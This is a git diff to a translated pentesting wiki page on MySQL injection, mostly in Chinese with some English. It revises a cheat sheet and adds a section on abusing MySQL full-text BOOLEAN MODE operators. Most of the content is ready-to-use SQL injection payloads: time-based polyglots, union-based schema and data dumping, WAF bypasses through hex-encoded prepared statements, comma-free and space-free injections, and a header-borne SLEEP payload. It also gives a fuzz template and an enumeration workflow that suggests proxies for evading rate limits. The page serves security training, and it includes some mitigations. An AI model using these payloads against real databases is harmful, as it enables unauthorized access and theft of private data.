diff --git a/src/pentesting-web/sql-injection/mysql-injection/README.md b/src/pentesting-web/sql-injection/mysql-injection/README.md index a66912ae9..2ee7eb207 100644 --- a/src/pentesting-web/sql-injection/mysql-injection/README.md +++ b/src/pentesting-web/sql-injection/mysql-injection/README.md @@ -1,4 +1,4 @@ -# MySQL 注入 +# MySQL injection {{#include ../../../banners/hacktricks-training.md}} @@ -48,28 +48,28 @@ strcmp(),mid(),,ldap(),rdap(),left(),rigth(),instr(),sleep() ```sql SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/" ``` -从 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/) +来自 [https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/](https://labs.detectify.com/2013/05/29/the-ultimate-sql-injection-payload/) ## 流程 -请记住,在“现代”版本的 **MySQL** 中,您可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"**(这可能有助于绕过 WAF)。 +请记住,在 "现代" 版本的 **MySQL** 中,你可以将 "_**information_schema.tables**_" 替换为 "_**mysql.innodb_table_stats**_**"** (这可能有助于绕过 WAFs). ```sql SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Get name of the tables SELECT column_name FROM information_schema.columns WHERE table_name=""; #Get name of the columns of the table SELECT , FROM ; #Get values SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges ``` -### **仅一个值** +### **只有 1 个值** - `group_concat()` - `Limit X,1` -### **盲注逐个** +### **Blind one by one** -- `substr(version(),X,1)='r'` 或 `substring(version(),X,1)=0x70` 或 `ascii(substr(version(),X,1))=112` +- `substr(version(),X,1)='r'` or `substring(version(),X,1)=0x70` or `ascii(substr(version(),X,1))=112` - `mid(version(),X,1)='5'` -### **盲注添加** +### **Blind adding** - `LPAD(version(),1...lenght(version()),'1')='asd'...` - `RPAD(version(),1...lenght(version()),'1')='asd'...` @@ -79,7 +79,7 @@ SELECT user FROM mysql.user WHERE file_priv='Y'; #Users with file privileges ## 检测列数 -使用简单的 ORDER +使用一个简单的 ORDER ``` order by 1 order by 2 @@ -92,7 +92,7 @@ UniOn SeLect 1,2 UniOn SeLect 1,2,3 ... ``` -## MySQL 联合查询基础 +## MySQL Union Based ```sql UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=... @@ -101,67 +101,68 @@ UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+... ``` ## SSRF -**在这里了解不同的选项以** [**滥用Mysql注入来获取SSRF**](mysql-ssrf.md)**。** +**在这里了解不同的选项来** [**abuse a Mysql injection to obtain a SSRF**](mysql-ssrf.md)**.** -## WAF绕过技巧 +## WAF 绕过技巧 -### 通过预处理语句执行查询 +### 通过 Prepared Statements 执行 queries -当允许堆叠查询时,可以通过将要执行的查询的十六进制表示分配给一个变量(使用SET),然后使用PREPARE和EXECUTE MySQL语句最终执行查询,从而绕过WAF。类似于这样: +当允许 stacked queries 时,可能可以通过将要执行的 query 的 hex representation 赋值给一个变量(使用 SET),然后使用 PREPARE 和 EXECUTE MySQL 语句来最终执行该 query,从而绕过 WAFs。像下面这样: ``` 0); SET @query = 0x53454c45435420534c454550283129; PREPARE stmt FROM @query; EXECUTE stmt; # ``` -有关更多信息,请参阅 [this blog post](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce)。 +欲了解更多信息,请参阅 [这篇博文](https://karmainsecurity.com/impresscms-from-unauthenticated-sqli-to-rce). ### Information_schema 替代方案 -请记住,在“现代”版本的 **MySQL** 中,您可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics** +请记住,在现代版本的 **MySQL** 中,你可以将 _**information_schema.tables**_ 替换为 _**mysql.innodb_table_stats**_ 或 _**sys.x$schema_flattened_keys**_ 或 **sys.schema_table_statistics** -### MySQL 注入无逗号 +### MySQLinjection 不使用逗号 -选择 2 列而不使用任何逗号 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)): +在不使用任何逗号的情况下选择两列 ([https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma](https://security.stackexchange.com/questions/118332/how-make-sql-select-query-without-comma)): ``` -1' union select * from (select 1)UT1 JOIN (SELECT table_name FROM mysql.innodb_table_stats)UT2 on 1=1# ``` -### 检索没有列名的值 +### 在不知道列名的情况下检索值 -如果在某个时刻你知道表的名称,但不知道表内列的名称,你可以尝试执行类似的操作来查找有多少列: +如果你知道表名但不知道表中列名,可以尝试通过执行类似如下的语句来查找表中有多少列: ```bash # When a True is returned, you have found the number of columns select (select "", "") = (SELECT * from demo limit 1); # 2columns select (select "", "", "") < (SELECT * from demo limit 1); # 3columns ``` -假设有两列(第一列是ID,另一列是flag),你可以尝试逐个字符地暴力破解flag的内容: +假设有 2 列(第一列为 ID,第二列为 flag),你可以尝试逐字符对 flag 的内容进行 bruteforce: ```bash # When True, you found the correct char and can start ruteforcing the next position select (select 1, 'flaf') = (SELECT * from demo limit 1); ``` -更多信息请见 [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952) +More info in [https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952](https://medium.com/@terjanq/blind-sql-injection-without-an-in-1e14ba1d4952) -### 无空格注入 (`/**/` 注释技巧) +### Injection without SPACES (`/**/` comment trick) -一些应用程序使用 `sscanf("%128s", buf)` 等函数对用户输入进行清理或解析,这些函数 **在第一个空格字符处停止**。因为 MySQL 将序列 `/**/` 视为注释 *和* 空白,所以可以用它来完全去除有效负载中的正常空格,同时保持查询在语法上有效。 +某些应用使用诸如 `sscanf("%128s", buf)` 的函数对用户输入进行清理或解析,这些函数会**在第一个空格字符处停止**。 +由于 MySQL 将序列 `/**/` 视为注释 *和* 空白字符,因此它可以用来在保持查询语法有效的同时,完全去除载荷中的普通空格。 -示例:基于时间的盲注入绕过空格过滤: +示例 time-based blind injection 用来绕过空格过滤: ```http GET /api/fabric/device/status HTTP/1.1 Authorization: Bearer AAAAAA'/**/OR/**/SLEEP(5)--/**/-' ``` -数据库接收为: +数据库接收到的是: ```sql ' OR SLEEP(5)-- -' ``` -这在以下情况下特别有用: +这在以下情况尤其有用: -* 可控缓冲区的大小受到限制(例如,`%128s`),并且空格会提前终止输入。 -* 通过 HTTP 头或其他字段注入,其中正常空格被删除或用作分隔符。 -* 与 `INTO OUTFILE` 原语结合使用,以实现完全的预认证 RCE(请参见 MySQL 文件 RCE 部分)。 +* 可控缓冲区大小受限(例如 `%128s`),空格会导致输入过早结束。 +* 通过 HTTP headers 或其他字段进行注入,这些字段会剥离或将普通空格用作分隔符。 +* 与 `INTO OUTFILE` 原语结合可实现完整的 pre-auth RCE(参见 MySQL File RCE 部分)。 --- ### MySQL 历史 -您可以在 MySQL 中查看其他执行,读取表:**sys.x$statement_analysis** +你可以查看 MySQL 中读取该表的其他执行:**sys.x$statement_analysis** ### 版本替代**s** ``` @@ -169,14 +170,63 @@ mysql> select @@innodb_version; mysql> select @@version; mysql> select version(); ``` -## 其他MYSQL注入指南 +## MySQL Full-Text Search (FTS) BOOLEAN MODE operator abuse (WOR) + +这不是经典的 SQL 注入。当开发者将用户输入传给 `MATCH(col) AGAINST('...' IN BOOLEAN MODE)` 时,MySQL 会在引号内解析一整套布尔搜索操作符。许多 WAF/SAST 规则只关注打破引号(quote breaking),因此会忽略这一面。 + +Key points: +- 操作符在引号内被解析: `+` (must include), `-` (must not include), `*` (trailing wildcard), `"..."` (exact phrase), `()` (grouping), `<`/`>`/`~` (weights)。See MySQL docs. +- 这允许在不跳出字符串字面量的情况下进行存在/不存在以及前缀测试,例如 `AGAINST('+admin*' IN BOOLEAN MODE)` 用来检测是否存在以 `admin` 开头的任何词。 +- 可用于构建 oracles,例如 “does any row contain a term with prefix X?” 并通过前缀扩展枚举隐藏字符串。 + +Example query built by the backend: +```sql +SELECT tid, firstpost +FROM threads +WHERE MATCH(subject) AGAINST('+jack*' IN BOOLEAN MODE); +``` +If the application returns different responses depending on whether the result set is empty (e.g., redirect vs. error message), that behavior becomes a Boolean oracle that can be used to enumerate private data such as hidden/deleted titles. + +Sanitizer bypass patterns (generic): +- Boundary-trim preserving wildcard: 如果后端通过类似 `(\b.{1,2})(\s)|(\b.{1,2}$)` 的正则对每个词修剪 1–2 个尾随字符,则提交 `prefix*ZZ`。清理器会修剪掉 `ZZ`,但保留 `*`,因此 `prefix*` 得以保留。 +- Early-break stripping: 如果代码按每个词去除操作符,但在遇到任意长度 ≥ min length 的 token 时停止处理,就发送两个 token:第一个是满足长度阈值的垃圾 token,第二个携带操作符 payload。例如:`&&&&& +jack*ZZ` → after cleaning: `+&&&&& +jack*`. + +Payload template (URL-encoded): +``` +keywords=%26%26%26%26%26+%2B{FUZZ}*xD +``` +- `%26` 是 `&`,`%2B` 是 `+`。尾随的 `xD`(或任何两个字母)会被 cleaner 修剪,但保留 `{FUZZ}*`。 +- 将重定向视为 “match”,错误页面视为 “no match”。不要自动跟随重定向,以便保持 oracle 可观测。 + +枚举工作流程: +1) 从 `{FUZZ} = a…z,0…9` 开始,通过 `+a*`, `+b*`, … 找到首字母匹配。 +2) 对于每个正向前缀,分支:`a* → aa* / ab* / …`。重复以恢复整个字符串。 +3) 如果应用实行流量控制,分散请求(proxies、多个账户)。 + +为什么标题经常 leak 而内容不会: +- 有些应用仅在对标题/主题进行初步 MATCH 之后才应用可见性检查。如果控制流在过滤之前依赖于 “any results?” 的结果,那么会发生存在性 leak。 + +缓解措施: +- 如果不需要 Boolean 逻辑,使用 `IN NATURAL LANGUAGE MODE`,或将用户输入视为字面值(escape/quote 会在其他模式中禁用运算符)。 +- 如果需要 Boolean 模式,在分词(tokenization)后对每个 token 剥离或中和所有 Boolean 运算符(`+ - * " ( ) < > ~`)(不要提前中断)。 +- 在 MATCH 之前应用可见性/授权过滤,或在结果集为空与非空时统一响应(恒定的时延/状态)。 +- 检查其他 DBMS 中的类似功能:PostgreSQL 的 `to_tsquery`/`websearch_to_tsquery`、SQL Server/Oracle/Db2 的 `CONTAINS` 也会解析带引号参数内部的运算符。 + +注意: +- Prepared statements 无法防止对 `REGEXP` 或搜索运算符的语义滥用。像 `.*` 这样的输入即使在带引号的 `REGEXP '.*'` 内仍然是一个宽松的正则。使用允许列表 (allow-lists) 或显式保护措施。 + +## Other MYSQL injection guides - [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) -## 参考文献 +## 参考资料 - [PayloadsAllTheThings – MySQL Injection cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/MySQL%20Injection.md) - [Pre-auth SQLi to RCE in Fortinet FortiWeb (watchTowr Labs)](https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/) +- [MySQL Full-Text Search – Boolean mode](https://dev.mysql.com/doc/refman/8.4/en/fulltext-boolean.html) +- [MySQL Full-Text Search – Overview](https://dev.mysql.com/doc/refman/8.4/en/fulltext-search.html) +- [MySQL REGEXP documentation](https://dev.mysql.com/doc/refman/8.4/en/regexp.html) +- [ReDisclosure: New technique for exploiting Full-Text Search in MySQL (myBB case study)](https://exploit.az/posts/wor/) {{#include ../../../banners/hacktricks-training.md}}